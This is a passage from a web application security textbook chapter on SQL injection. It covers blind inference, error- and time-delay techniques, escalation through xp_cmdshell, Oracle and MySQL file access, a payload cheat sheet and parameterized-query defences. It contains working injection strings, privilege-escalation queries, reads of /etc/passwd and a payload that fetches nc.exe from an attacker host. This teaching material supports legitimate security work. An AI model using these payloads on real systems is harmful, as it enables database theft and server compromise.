‘ AND 1=1--

‘ AND 1=2--

Provided that you have configured Absinthe correctly, the two test requests

should result in different responses from the application, confirming that you

are ready to exploit the vulnerability.

Chapter 9 ■ Injecting Code 279

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 279

TIP Depending on the syntactic complexity of the query into which you are

injecting, your first connection test may or may not be successful in generating

different responses from the application. If it is not, then you need to fix up

the syntax of the query that Absinthe’s requests are generating, given your

understanding gained from your manual probing of the application. To modify

the syntax following Absinthe’s payload, you can change the Append Text to

End of Query option. To modify the syntax before the payload, you can change

the default value for the relevant parameter. Keep experimenting until the

Initialize Injection test is successful.

When you are satisfied that Absinthe has been correctly configured to

exploit the vulnerability, you can launch the attack. To do this, go to the DB

Schema tab and select one or more of the available actions: Retrieve Username,

Load Table Info, and Load Field Info.

Absinthe works by replacing the test

1=1 condition with a huge number of

other conditions designed to discover the contents of the database and retrieve

arbitrary data from it.

For example, if you are targeting the Oracle platform, Absinthe may dis-

cover the first character of the current database user’s username by injecting

values like the following:

admin’ AND (SELECT ASCII(SUBSTR(a.username,1,1)) FROM USER_USERS a WHERE

A.USERNAME = user) = 65

This condition will be true if the first character of the username is A.

Absinthe will detect that it is true because the application’s response is identi-

cal to the original

1=1 response. By automating a large number of queries,

Absinthe will retrieve the entire string.

In fact, rather than iterating through every possible character to find a hit,

Absinthe uses a more sophisticated binary chop technique, which dramatically

reduces the number of requests needed. This involves first testing whether the

queried character is higher than X, which is the middle value in the range of

allowed values. If so, the test is repeated for 1.5X; if not, it is repeated for 0.5X.

For example:

admin’ AND (SELECT ASCII(SUBSTR(a.username,1,1)) FROM USER_USERS a WHERE

A.USERNAME = user) > 19443--

admin’ AND (SELECT ASCII(SUBSTR(a.username,1,1)) FROM USER_USERS a WHERE

A.USERNAME = user) > 9722--

etc...

In general, this method enables the value of the targeted character to be dis-

covered in the smallest possible number of attempts.

280 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 280

Absinthe understands how to probe the metadata of each type of database,

as described earlier. This enables it to use the preceding simple steps to

retrieve any desired data from within the database, including the table and

column structure, and the actual data held within any given table. It presents

all of this information in a hierarchical tree format, as shown in Figure 9-2.

Figure 9-2: Absinthe results showing the table structure within

the database

When Absinthe has gathered all of the data that you require, you can even

export the captured information in XML format, by going to the Download

Records tab. For example:

<LOGIN>admin</LOGIN>

</DataRecord>

Chapter 9 ■ Injecting Code 281

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 281

<PASSWORD>gameover</PASSWORD>

<LOGIN>maniscprout</LOGIN>

</DataRecord>

</datatable>

</AbsinthedatabasePull>

Inducing Conditional Errors

In the preceding example, the application contained some prominent func-

tionality whose logic could be directly controlled by injecting into an existing

SQL query. The designed behavior of the application (a successful versus a

failed login) could be hijacked to return a single item of information to the

attacker. However, not all situations are this straightforward. In some cases,

you may be injecting into a query that has no noticeable effect on the applica-

tion’s behavior, such as a logging mechanism. In other cases, you may be

injecting a subquery or a batched query whose results are not processed by the

application in any way. In this situation, you may struggle to find a way of

causing a detectable difference in behavior that is contingent on a specified

condition.

David Litchfield devised a technique that can be used to trigger a detectable

difference in behavior in most circumstances. The core idea is to inject a query

that induces a database error contingent upon some specified condition. When

a database error occurs, this will often be externally detectable, either through

an HTTP 500 response code, or through some kind of error message or anom-

alous behavior (even if the error message itself does not disclose any useful

information).

The technique relies upon a feature of database behavior when evaluating

conditional statements: the database only evaluates those parts of the state-

ment that need to be evaluated given the status of other parts. An example of

this behavior is a

SELECT statement containing a WHERE clause:

SELECT X FROM Y WHERE C

This causes the database to work through each row of table Y, evaluating

condition

C, and returning X in those cases where condition C is true. If condi-

tion

C is never true, then the expression X is never evaluated.

This behavior can be exploited by finding an expression

X that is syntacti-

cally valid but that generates an error if it is ever evaluated. An example of

such an expression in Oracle and MS-SQL is a divide-by-zero computation,

such as

1/0. If condition C is ever true, then expression X will be evaluated,

causing a database error. If condition

C is always false, then no error will be

generated. You can, therefore, use the presence or absence of an error to test an

arbitrary condition

282 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 282

An example of this is the following query, which tests whether the default

Oracle user

DBSNMP exists. If this user exists, then the expression 1/0 is evalu-

ated, causing an error:

SELECT 1/0 FROM dual WHERE (SELECT username FROM all_users WHERE

username = ‘DBSNMP’) = ‘DBSNMP’

The following query tests whether an invented user AAAAAA exists. Because

the

WHERE condition is never true, the expression 1/0 is not evaluated, and so

no error occurs.

SELECT 1/0 FROM dual WHERE (SELECT username FROM all_users WHERE

username = ‘AAAAAA’) = ‘AAAAAA’

What this technique achieves is a way of inducing a conditional response

within the application, even in cases where the query you are injecting has no

impact on the application’s logic or data processing. It, therefore, enables you

to use the inference techniques described previously to extract data in a very

wide range of situations. Further, because of the technique’s simplicity, the

same attack strings will work on a range of databases, and where the injection

point is into various types of SQL statement.

Using Time Delays

Despite all of the sophisticated techniques already described, there may yet be

situations in which none of these tricks are effective. In some cases, you may

be able to inject a query that returns no results to the browser, cannot be used

to open an out-of-band channel, and that has no effect on the application’s

behavior, even if it induces an error within the database itself.

In this situation, all is not lost, thanks to a technique invented by Chris

Anley and Sherief Hammad of NGSSoftware. They devised a way of crafting

a query that would cause a time delay, contingent upon some condition speci-

fied by the attacker. The attacker can submit his query, and then monitor the

time taken for the server to respond. If a delay occurs, then the attacker may

infer that the condition is true. Even if the actual content of the application’s

response is identical in the two cases, the presence or absence of a time delay

enables the attacker to extract a single bit of information from the database. By

performing numerous such queries, the attacker can systematically retrieve

arbitrarily complex data from the database, one bit at a time.

The precise means of inducing a suitable time delay depends upon the tar-

get database being used. MS-SQL contains a built-in

WAITFOR command, which

can be used to cause a specified time delay. For example, the following query

will cause a time delay of 5 seconds if the current database user is

sa:

if (select user) = ‘sa’ waitfor delay ‘0:0:5’

Chapter 9 ■ Injecting Code 283

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 283

Equipped with this command, the attacker can retrieve arbitrary informa-

tion in various ways. One method is to leverage the same technique already

described for the case where the application returns conditional responses.

Now, instead of triggering a different application response when a particular

condition is detected, the injected query instead induces a time delay. For

example, the second of these queries will cause a time delay, indicating that the

first letter of the captured string is A:

if ASCII(SUBSTRING(‘Admin’,1,1)) = 64 waitfor delay ‘0:0:5’

if ASCII(SUBSTRING(‘Admin’,1,1)) = 65 waitfor delay ‘0:0:5’

As before, the attacker can cycle through all possible values for each charac-

ter until a time delay occurs. Alternatively, the attack could be made more effi-

cient by reducing the number of requests needed. An additional technique to

that described previously for Absinthe is to break each byte of data down into

individual bits and retrieve each bit in a single query. The

POWER command and

the bitwise

AND operator & can be used to specify conditions on a bit-by-bit

basis. For example, the following query will test the first bit of the first byte of

the captured data, and pause if it is 1:

if (ASCII(SUBSTRING(‘Admin’,1,1)) & (POWER(2,0))) > 0 waitfor delay

‘0:0:5’

The following query will perform the same test on the second bit:

if (ASCII(SUBSTRING(‘Admin’,1,1)) & (POWER(2,1))) > 0 waitfor delay

‘0:0:5’

As mentioned earlier, the means of inducing a time delay are highly database-

dependent. Other databases do not contain a built-in time-delay command;

however, you can easily use other tricks to cause a time delay to occur.

In MySQL, the benchmark function can be used to perform a specified

action repeatedly. Instructing the database to perform a processor-intensive

action, such as a SHA-1 hash, a large number of times will result in a measur-

able time delay. For example:

select if(user() like ‘root@%‘, benchmark(50000,sha1(‘test’)), ‘false’)

In Oracle, one trick is to use UTL_HTTP to connect to a nonexistent server,

causing a timeout. This will cause the database to attempt to connect to the

specified server, and eventually timeout. For example:

SELECT ‘a’||Utl_Http.request(‘http://madeupserver.com’) from dual

...delay...

ORA-29273: HTTP request failed

ORA-06512: at “SYS.UTL_HTTP”, line 1556

ORA-12545: Connect failed because target host or object does not exist

284 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 284

You can leverage this behavior to cause a time delay contingent on some

condition that you specify. For example, the following query will cause a time-

out if the default Oracle account

DBSNMP exists:

SELECT ‘a’||Utl_Http.request(‘http://madeupserver.com’) FROM dual WHERE

(SELECT username FROM all_users WHERE username = ‘DBSNMP’) = ‘DBSNMP’

In both Oracle and MySQL databases, you can use the SUBSTR(ING)and

ASCII functions to retrieve arbitrary information one byte at a time, as

described previously.

TIP We have described the use of time delays as a means of extracting

interesting information. However, the time-delay technique can also be

immensely useful when performing initial probing of an application to detect

SQL injection vulnerabilities. In some cases of completely blind SQL injection,

where no results are returned to the browser and all errors are handled

invisibly, the vulnerability itself may be very hard to detect using standard

techniques based on supplying crafted input. In this situation, using time delays

is often the most reliable way of detecting the presence of a vulnerability

during initial probing. For example, if the back-end database is MS-SQL, then

you can inject each of the following strings into each request parameter in turn,

and monitor the time taken for the application to respond to identify any

vulnerabilities:

‘; waitfor delay ‘0:30:0’--

1; waitfor delay ‘0:30:0’--

Beyond SQL Injection: Escalating the Database Attack

A successful exploit of an SQL injection vulnerability very often results in total

compromise of all application data. Most applications employ a single account

for all database access and rely upon application-layer controls to enforce seg-

regation of access between different users. Gaining unrestricted use of the

application’s database account results in access to all of its data.

You may suppose, therefore, that owning all of the application’s data is the

finishing point of a SQL injection attack. However, there are many reasons

why it might be productive to advance your attack further, either by exploiting

a vulnerability within the database itself, or by harnessing some of its built-in

functionality to achieve your objectives. Further attacks that can be performed

by escalating the database attack include the following:

■■

If the database is shared with other applications, you may be able to

escalate privileges within the database and gain access to other applica-

tions’ data.

Chapter 9 ■ Injecting Code 285

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 285

■■

You may be able to compromise the operating system of the database

server.

■■

You may be able to gain network access to other systems. Typically, the

database server is hosted on a protected network behind several layers

of network perimeter defenses. From the database server, you may be

in a trusted position and be able to reach key services on other hosts,

which may be further exploitable.

■■

You may be able to make network connections back out of the hosting

infrastructure to your own computer. This may enable you to bypass

the application altogether, easily transmitting large amounts of sensi-

tive data gathered from the database, and often evading many intrusion

detection systems.

■■

You may be able to extend the database’s existing functionality in arbi-

trary ways by creating user-defined functions. In some situations, this

may enable you to circumvent hardening that has been performed on

the database, by effectively re-implementing functionality that has been

removed or disabled. There is a method for doing this in each of the

mainstream databases, provided that you have gained database admin-

istrator (DBA) privileges.

COMMON MYTH Many database administrators assume that it is not

necessary to defend the database against attacks that require authentication to

exploit. They may reason that the database is accessed by only a trusted

application that is owned by the same organization. This ignores the possibility

that a flaw within the application may enable a malicious third party to interact

with the database within the security context of the application. Each of the

possible attacks just described should illustrate why databases need to be

defended against authenticated attackers.

Attacking databases is a huge topic, which is beyond the scope of this book.

In this section, we will point you towards a few key ways in which vulnerabil-

ities and functionality within the main database types can be leveraged to

escalate your attack. The key conclusion to draw is that every database con-

tains ways of escalating privileges. Applying current security patches and

robust hardening can help to mitigate many of these attacks, but not all of

them. For further reading on this highly fruitful area of current research, we

recommend The Database Hacker’s Handbook (Wiley, 2005).

MS-SQL

Perhaps the most notorious piece of database functionality that an attacker can

misuse is the

xp_cmdshell stored procedure, which is built into MS-SQL by

286 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 286

default. This stored procedure allows users with DBA permissions to execute

operating system commands in the same way as the

cmd.exe command

prompt. For example:

master..xp_cmdshell ‘ipconfig > foo.txt’

The scope for an attacker to misuse this functionality is huge. They can per-

form arbitrary commands, pipe the results to local files, and read them back.

They can open out-of-band network connections back to themselves and

create a backdoor command and communications channel, copying data from

the server and uploading attack tools. Because MS-SQL runs by default as

LocalSystem, the attacker can typically fully compromise the underlying oper-

ating system, performing arbitrary actions. There is a wealth of other extended

stored procedures within MS-SQL, such as

xp_regread or xp_regwrite, that

can be used to perform powerful actions.

Not every database account will have permissions to use these built-in stored

procedures, and in some cases the application uses a low-privileged account

that does not have the required permissions. However, it is extremely common

for applications to be using the all-powerful

sa account, because administrators

assume that the application is trusted not to abuse the database.

The

OpenRowSet command can be leveraged to perform a port scan of any

local or remote network. If the specified IP address and port are open, the data-

base will attempt to connect, and eventually timeout; otherwise, it will fail

immediately. You can, therefore, use time delays to infer the status of ports that

you cannot reach directly:

select * from OPENROWSET(‘SQLOLEDB’, ‘uid=sa;pwd=foobar;Network=DBMSSOCN

;Address=192.168.0.1,80;timeout=5’, ‘’)

This command can also be used to perform other attacks:

■■

You can try to connect to other databases and guess usernames and pass-

words (for example, the common

sa account with a blank password).

■■

You can connect back to the local host and attempt to guess the pass-

word to the

sa account. In some situations, administrators assign a

weak password to this account in the belief that the database server is

firewalled and so no attacker will be able to connect. You can circum-

vent this restriction because you are connecting directly from the server

itself.

■■

Sometimes, if Windows-integrated authentication is in use, and multi-

ple databases are configured with the same credentials, you may be

able to authenticate transparently from one database to another without

supplying any credentials.

Chapter 9 ■ Injecting Code 287

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 287

Oracle

A huge number of security vulnerabilities have been found within the Oracle

database software itself. If you have found an SQL injection vulnerability that

enables you to perform arbitrary queries, then you can typically escalate to

DBA privileges by exploiting one of these vulnerabilities.

Oracle contains many built-in stored procedures that execute with DBA

privileges and have been found to contain SQL injection flaws within the pro-

cedures themselves. One example of such a flaw existed in the default package

SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES prior to the July

2006 critical patch update. This can be exploited to escalate privileges by

injecting the query

grant DBA to public into the vulnerable field:

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘INDX’,’SCH’,’T

EXTINDEXMETHODS”.ODCIIndexUtilCleanup(:p1); execute immediate ‘’declare

pragma autonomous_transaction; begin execute immediate ‘’‘’grant dba to

public’‘’‘ ; end;’‘; END;--‘,’CTXSYS’,1,‘1’,0) from dual

This type of attack could be delivered via a SQL injection flaw in a web

application by injecting the function into the vulnerable parameter.

Many other types of flaws have affected built-in components of Oracle. One

example is the

CTXSYS.DRILOAD.VALIDATE_STMT function. The purpose of this

function is to test that a specified string contains a valid SQL statement. How-

ever, in earlier versions of Oracle, in the course of validating the supplied

statement the function actually executed it! This meant that any user could

execute any statement as DBA, simply by passing it to this function. For exam-

ple:

exec CTXSYS.DRILOAD.VALIDATE_STMT(‘GRANT DBA TO PUBLIC’)

In addition to actual vulnerabilities like these, Oracle also contains a large

amount of default functionality that is accessible by low-privileged users and

can be used to perform undesirable actions, such as initiating network con-

nections or accessing the file system. In addition to the powerful packages

already described for creating out-of-band connections, the package

UTL_FILE

can be used to read from and write to files on the database server file system.

See The Oracle Hacker’s Handbook by David Litchfield (Wiley, 2007) for more

detail on escalating privileges within Oracle.

MySQL

Compared to the other databases covered, MySQL contains relatively little

built-in functionality that can be misused by an attacker. One example is the

288 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 288

ability of any user with the FILE_PRIV permission to read and write to the file

system.

The

LOAD_FILE command can be used to retrieve the contents of any file. For

example:

select load_file(‘/etc/passwd’)

The SELECT ... INTO OUTFILE command can be used to pipe the results of

any query into a file. For example

create table test (a varchar(200))

insert into test(a) values (‘+ +’)

select * from test into outfile ‘/etc/hosts.equiv’

In addition to reading and writing key operating system files, this capability

can also be used to perform other attacks:

■■

Because MySQL stores its data in plaintext files, to which the database

must have read access, an attacker with

FILE_PRIV permissions can

simply open the relevant file and read arbitrary data from within the

database, bypassing any access controls enforced within the database

itself.

■■

MySQL enables users to create user-defined functions (UDFs), by

calling out to a compiled library file that contains the function’s

implementation. This file must be located within the normal path from

which MySQL loads dynamic libraries. An attacker can use the preced-

ing method to create an arbitrary binary file within this path and then

create a UDF that uses it. See Chris Anley’s paper “Hackproofing

MySQL” for more details of this technique.

SQL Syntax and Error Reference

We have described numerous techniques that enable you to probe for and

exploit SQL injection vulnerabilities in web applications. In many cases, there

are minor differences between the syntax that you need to employ against dif-

ferent back-end database platforms. Further, every database produces differ-

ent error messages whose meaning you need to understand both when

probing for flaws and when attempting to craft an effective exploit. The fol-

lowing pages contain a brief cheat sheet that you can use to look up the exact

syntax you need for a particular task, and to decipher any unfamiliar error

messages which you encounter.

Chapter 9 ■ Injecting Code 289

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 289

SQL Syntax

Requirement: ASCII and SUBSTRING

Oracle: ASCII(‘A’) is equal to 65

SUBSTR(‘ABCDE’,2,3) is equal to BCD

MS-SQL: ASCII(‘A’) is equal to 65

SUBSTRING(‘ABCDE’,2,3) is equal to BCD

MySQL: ASCII(‘A’) is equal to 65

SUBSTRING(‘ABCDE’,2,3) is equal to BCD

Requirement: Retrieve current database user

Oracle: Select Sys.login_user from dual

SELECT user FROM dual

SYS_CONTEXT(‘USERENV’,’SESSION_USER’)

MS-SQL: select user

select suser_sname()

MySQL: SELECT user()

Requirement: Cause a time delay

Oracle: Utl_Http.request(‘http://madeupserver.com’)

MS-SQL: waitfor delay ‘0:0:10’

exec master..xp_cmdshell ‘ping localhost’

MySQL: benchmark(50000,sha1(‘test’))

Requirement: Retrieve database version string

Oracle: select banner from v$version

MS-SQL: select @@version

MySQL: select @@version

Requirement: Retrieve current database

Oracle: SYS_CONTEXT(‘USERENV’,’DB_NAME’)

MS-SQL: select db_name()

The server name can be retrieved using:

select @@servername

MySQL: Select database()

290 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 290

Requirement: Retrieve current user’s privilege

Oracle: select * from session_privs

MS-SQL: select grantee, table_name, privilege_type

from INFORMATION_SCHEMA.TABLE_PRIVILEGES

MySQL: SHOW GRANTS FOR CURRENT_USER()

Requirement: Show user objects

Oracle: Select object_name, object_type from

user_objects

MS-SQL: SELECT * FROM sysobjects

MySQL: (There is no database metadata in MySQL.)

Requirement: Show user tables

Oracle: Select object_name, object_type from

user_objects WHERE object_type=’TABLE’

Or to show all tables to which the user has access:

SELECT table_name FROM all_tables

MS-SQL: SELECT * FROM sysobjects WHERE xtype=’U’

MySQL: (There is no database metadata in MySQL.)

Requirement: Show column names for table foo

Oracle: Select column_name, Name from user_tab_columns

where table_name = ‘FOO’

Use the ALL_tab_columns table if the target data is not

owned by the current application user.

MS-SQL: SELECT syscolumns.* FROM syscolumns JOIN

sysobjects ON syscolumns.id=sysobjects.id

WHERE sysobjects.name=’FOO’

MySQL: show columns from foo

Requirement: Interact with the operating system (simplest ways)

Oracle: See The Oracle Hacker’s Handbook, by David Litchfield

MS-SQL: exec xp_cmshell ‘dir c:\‘

MySQL: select load_file(‘/etc/passwd’)

Chapter 9 ■ Injecting Code 291

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 291

SQL Error Messages

Oracle: ORA-01756: quoted string not properly

terminated

ORA-00933: SQL command not properly ended

MS-SQL: Msg 170, Level 15, State 1, Line 1

Line 1: Incorrect syntax near ‘foo

Msg 105, Level 15, State 1, Line 1

Unclosed quotation mark before the character

string ‘foo

MySQL: You have an error in your SQL syntax. Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near ‘’foo’ at line X

Translation: For Oracle and MS-SQL, SQL injection is present, and it is

almost certainly exploitable! If you entered a single quote and

it altered the syntax of the database query, this is the error

you’d expect.

For MySQL, SQL injection may well be present, but the same

error message can appear in other contexts.

Oracle: PLS-00306: wrong number or types of arguments

in call to ‘XXX’

MS-SQL: Procedure ‘XXX’ expects parameter ‘@YYY’,

which was not supplied

MySQL: N/A

Translation: You have commented out or removed a variable that would

normally be supplied to the database. In MS-SQL, you should

be able to use time delay enumeration to perform arbitrary

data retrieval.

Oracle: ORA-01789: query block has incorrect number of

result columns

MS-SQL: Msg 205, Level 16, State 1, Line 1

All queries in an SQL statement containing a

UNION operator must have an equal number of

expressions in their target lists.

MySQL: The used SELECT statements have a different

number of columns

Translation: You will see this when you are attempting a UNION SELECT

attack, and you have specified a different number of columns

to the number in the original SELECT statement.

292 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 292

Oracle: ORA-01790: expression must have same datatype

as corresponding expression

MS-SQL: Msg 245, Level 16, State 1, Line 1

Syntax error converting the varchar value

‘foo’ to a column of data type int.

MySQL: (MySQL will not give you an error.)

Translation: You will see this when you are attempting a UNION SELECT

attack, and you have specified a different data type from that

found in the original SELECT statement. Try using a NULL, or

using 1 or 2000.

Oracle: ORA-01722: invalid number

ORA-01858: a non-numeric character was found

where a numeric was expected

MS-SQL: Msg 245, Level 16, State 1, Line 1

Syntax error converting the varchar value

‘foo’ to a column of data type int.

MySQL: (MySQL will not give you an error.)

Translation: Your input doesn’t match the expected data type for the field.

You may have SQL Injection, and you may not need a single

quote, so try simply entering a number followed by your SQL

to be injected.

In MS-SQL, you should be able to return any string value with

this error message.

Oracle: ORA-00923: FROM keyword not found where

expected

MS-SQL: N/A

MySQL: N/A

Translation: The following will work in MS-SQL:

SELECT 1

But in Oracle, if you want to return something, you must

select from a table. The DUAL table will do fine:

SELECT 1 from DUAL

Oracle: ORA-00936: missing expression

MS-SQL: Msg 156, Level 15, State 1, Line 1

Incorrect syntax near the keyword ‘from’.

Chapter 9 ■ Injecting Code 293

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 293

MySQL: You have an error in your SQL syntax. Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near ‘ XXX , YYY from SOME_TABLE’ at line 1

Translation: You commonly see this error message when your injection

point occurs before the FROM keyword (for example, you have

injected into the columns to be returned) and/or you have

used the comment character to remove required SQL

keywords.

Try completing the SQL statement yourself while using your

comment character.

MySQL should helpfully reveal the column names XXX, YYY

when this condition is encountered.

Oracle: ORA-00972: identifier is too long

MS-SQL: String or binary data would be truncated.

MySQL: N/A

Translation: This does not indicate SQL injection. You may see this error

message if you have entered a long string. You’re not likely to

get a buffer overflow here either, as the database is handling

your input safely.

Oracle: ORA-00942: table or view does not exist

MS-SQL: Msg 208, Level 16, State 1, Line 1

Invalid object name ‘foo’

MySQL: Table ‘DBNAME.SOMETABLE’ doesn’t exist

Translation: Either you are trying to access a table or view that does not

exist, or in the case of Oracle, the database user does not

have privileges for the table or view. Test your query against a

table you know you have access to, such as DUAL.

MySQL should helpfully reveal the current database schema

DBNAME when this condition is encountered.

Oracle: ORA-00920: invalid relational operator

MS-SQL: Msg 170, Level 15, State 1, Line 1

Line 1: Incorrect syntax near foo

MySQL: You have an error in your SQL syntax. Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near ‘’ at line 1

Translation: You were probably altering something in a WHERE clause, and

your SQL injection attempt has disrupted the grammar.

294 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 294

Oracle: ORA-00907: missing right parenthesis

MS-SQL: N/A

MySQL: You have an error in your SQL syntax. Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near ‘’ at line 1

Translation: Your SQL injection attempt has worked, but the injection point

was inside parentheses ( ). You probably commented out the

closing parenthesis with injected comment characters --.

Oracle: ORA-00900: invalid SQL statement

MS-SQL: Msg 170, Level 15, State 1, Line 1

Line 1: Incorrect syntax near foo

MySQL: You have an error in your SQL syntax. Check

the manual that corresponds to your MySQL

server version for the right syntax to use

near XXXXXX

Translation: A general error message. The error messages listed previously

all take precedence, so something else went wrong. It’s likely

you can try alternative input and get a more meaningful

message.

Oracle: ORA-03001: unimplemented feature

MS-SQL: N/A

MySQL: N/A

Translation: You have tried to perform an action that Oracle does not

allow. This can happen if you were trying to display the

database version string from v$version but you were in an

UPDATE or INSERT query.

Oracle: ORA-02030: can only select from fixed

tables/views

MS-SQL: N/A

MySQL: N/A

Translation: You were probably trying to edit a SYSTEM view. This can

happen if you were trying to display the database version

string from v$version but you were in an UPDATE or

INSERT query

Chapter 9 ■ Injecting Code 295

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 295

Preventing SQL Injection

Despite all of its different manifestations, and the complexities that can arise in

its exploitation, SQL injection is in general one of the easier vulnerabilities to

prevent. Nevertheless, discussion about SQL injection countermeasures is fre-

quently misleading, and many people rely upon defensive measures that are

only partially effective.

Partially Effective Measures

Because of the prominence of the single quotation mark in the standard expla-

nations of SQL injection flaws, a common approach to preventing attacks is to

escape any single quotation marks within user input by doubling them up.

You have already seen two situations in which this approach fails:

■■

If numeric user-supplied data is being embedded into SQL queries, this

is not normally encapsulated within single quotation marks. Hence, an

attacker can break out of the data context and begin entering arbitrary

SQL, without the need to supply a single quotation mark.

■■

In second-order SQL injection attacks, data that has been safely escaped

when initially inserted into the database is subsequently read from the

database and then passed back to it again. Quotation marks that have

been doubled up initially will return to their original form when the

data is reused.

Another countermeasure that is often cited is the use of stored procedures

for all database access. There is no doubt that custom stored procedures can

provide security and performance benefits; however, they are not guaranteed

to prevent SQL injection vulnerabilities, for two reasons:

■■

As you saw in the case of Oracle, a poorly written stored procedure can

contain SQL injection vulnerabilities within its own code. Similar secu-

rity issues arise when constructing SQL statements within stored proce-

dures as do elsewhere, and the fact that a stored procedure is being

used does not prevent flaws from arising.

■■

Even if a robust stored procedure is being used, SQL injection vulnera-

bilities can arise if it is invoked in an unsafe way using user-supplied

input. For example, suppose that a user registration function is imple-

mented within a stored procedure, which is invoked as follows:

exec sp_RegisterUser ‘joe’, ‘secret’

This statement may be just as vulnerable as a simple INSERT statement.

For example, an attacker may supply the following password:

foo’; exec master..xp_cmdshell ‘tftp wahh-attacker.com GET nc.exe’--

296 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 296

which causes the application to perform the following batch query:

exec sp_RegisterUser ‘joe’, ‘foo’; exec master..xp_cmdshell ‘tftp

wahh-attacker.com GET nc.exe’--‘

and so the use of the stored procedure has achieved nothing.

In fact, in a large and complex application that performs thousands of dif-

ferent SQL statements, many developers regard the solution of re-implement-

ing these statements as stored procedures to be an unjustifiable overhead on

development time.

Parameterized Queries

Most databases and application development platforms provide APIs for han-

dling untrusted input in a secure way which prevents SQL injection vulnera-

bilities from arising. In parameterized queries (also known as prepared

statements), the construction of a SQL statement containing user input is per-

formed in two steps:

1. The application specifies the structure of the query, leaving placehold-

ers for each item of user input.

2. The application specifies the contents of each placeholder.

Crucially, there is no way in which crafted data that is specified at the sec-

ond step can interfere with the structure of the query specified in the first step.

Because the query structure has already been defined, the relevant API han-

dles any type of placeholder data in a safe manner, and so it is always inter-

preted as data rather than part of the statement’s structure.

The following two code samples illustrate the difference between an

unsafe query dynamically constructed out of user data, and its safe parame-

terized counterpart. In the first, the user-supplied

name parameter is embed-

ded directly into a SQL statement, leaving the application vulnerable to SQL

injection:

//define the query structure

String queryText = “select ename,sal from emp where ename =’“;

//concatenate the user-supplied name

queryText += request.getParameter(“name”);

queryText += “‘“;

// execute the query

stmt = con.createStatement();

rs = stmt.executeQuery(queryText);

Chapter 9 ■ Injecting Code 297

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 297

In the second example, the query structure is defined using a question mark

as a placeholder for the user-supplied parameter. The

prepareStatement

method is invoked to interpret this, and fix the structure of the query that is to

be executed. Only then is the

setString method used to specify the actual

value of the parameter. Because the query’s structure has already been fixed,

this value can contain any data at all, without affecting the structure. The

query is then executed safely:

//define the query structure

String queryText = “SELECT ename,sal FROM EMP WHERE ename = ?”;

//prepare the statement through DB connection “con”

stmt = con.prepareStatement(queryText);

//add the user input to variable 1 (at the first ? placeholder)

stmt.setString(1, request.getParameter(“name”));

// execute the query

rs = stmt.executeQuery();

NOTE The precise methods and syntax for creating parameterized queries

differ among databases and application development platforms. See Chapter 18

for more details about the most common examples.

If parameterized queries are to be an effective solution against SQL injec-

tion, then there are three important provisos to bear in mind:

■■

They should be used for every database query. The authors have

encountered many applications where the developers made a judgment

in each case whether or not to use a parameterized query. In cases

where user-supplied input was clearly being used, they did so; other-

wise, they didn’t bother. This approach has been the cause of many SQL

injection flaws. First, by focusing only on input that has been immedi-

ately received from the user, it is easy to overlook second-order attacks

because data that has already been processed is assumed to be trusted.

Second, it is easy to make mistakes about the specific cases in which the

data being handled is user-controllable. In a large application, different

items of data will be held within the session or received from the client.

Assumptions made by one developer may not be communicated to oth-

ers. The handling of specific data items may change in the future, intro-

ducing a SQL injection flaw into previously safe queries. It is much

safer to take the approach of mandating the use of parameterized

queries throughout the application.

■■

Every item of data inserted into the query should be properly parame-

terized. The authors have encountered numerous cases where most of a

query’s parameters are handled safely; however, one or two items are

298 Chapter 9 ■ Injecting Code

70779c09.qxd:WileyRed 9/14/07 3:13 PM Page 298

concatenated directly into the string used to specify the query structure.

The use of parameterized queries will not prevent SQL injection if some

parameters are handled in this way.

■■

Parameter placeholders cannot be used to specify the table and column

names used in the query. In some very rare cases, applications need to

specify these items within an SQL query on the basis of user-supplied

data. In this situation, the best approach is to use a white list of known

good values (i.e., the list of tables and columns actually used within the

database) and reject any input that does not match an item on this list.

Failing this, strict validation should be enforced on the user input — for

example, allowing only alphanumeric characters, excluding white-

space, and enforcing a suitable length limit.

Defense in Depth

As always, a robust approach to security should employ defense-in-depth

measures to provide additional protection in the event that front-line defenses

fail for any reason. In the context of attacks against back-end databases, there

are three layers of further defense that can be employed:

■■

The application should use the lowest possible level of privileges when

accessing the database. In general, the application does not need DBA-

level permissions — it normally only needs to read and write its own

data. In security-critical situations, the application may employ a differ-

ent database account for performing different actions. For example, if

90% of its database queries only require read access, then these can be

performed using an account which does not have write privileges. If a

particular query only needs to read a subset of data (for example, the

orders table, but not the user accounts table), then an account with the

corresponding level of access can be used. If this approach is enforced

throughout the application, then any residual SQL injection flaws that

may exist are likely to have their impact significantly reduced.

■■

Many enterprise databases include a huge amount of default function-

ality that can be leveraged by an attacker who gains the ability to

execute arbitrary SQL statements. Wherever possible, unnecessary

functions should be removed or disabled. Even though there are cases

where a skilled and determined attacker may be able to recreate some

required functions through other means, this task is not usually

straightforward, and the database hardening will still place significant

obstacles in the way of the attacker.

■■

All vendor-issued security patches should be evaluated, tested, and

applied in a timely way, to fix known vulnerabilities within the database

